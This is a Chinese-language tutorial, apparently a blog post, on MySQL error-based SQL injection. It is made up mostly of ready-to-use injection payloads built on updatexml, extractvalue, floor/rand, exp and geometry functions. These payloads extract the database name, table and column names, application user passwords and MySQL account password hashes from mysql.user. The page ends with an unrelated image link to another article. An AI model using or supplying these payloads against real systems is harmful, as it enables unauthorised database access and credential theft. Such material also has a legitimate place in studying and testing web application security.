报错注入
- 报错注入定义
- 代码展示
- 常用的报错语句
- 1.获取数据库名称
- 2.获取mysql账号密码
- 3.获取表名
- 4.获取字段名
- 5.获取账号密码
报错注入定义
报错注入:利用sql语句的不规范,获取相关sql提示信息
代码展示
常用的报错语句
select first_name, last_name FROM users where user_id = ‘1’ and info() –
#获取当前使用的库
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#获取数据库敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
1.获取数据库名称
1' and info() --
2.获取mysql账号密码
1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) --
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) --
因为一条只能显示32字符,所以两段拼接则为mysql密码
3.获取表名
1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --
4.获取字段名
1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --
借助burpsuite
5.获取账号密码
1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --
![[架构之路-164]-《软考-系统分析师》-3-操作系统基本原理-文件系统(文件的逻辑组织、文件的物理组织、硬盘空间管理、分布式文件系统)](https://img-blog.csdnimg.cn/img_convert/5a897548f08da846f8b1ecedefed30ec.webp?x-oss-process=image/format,png)
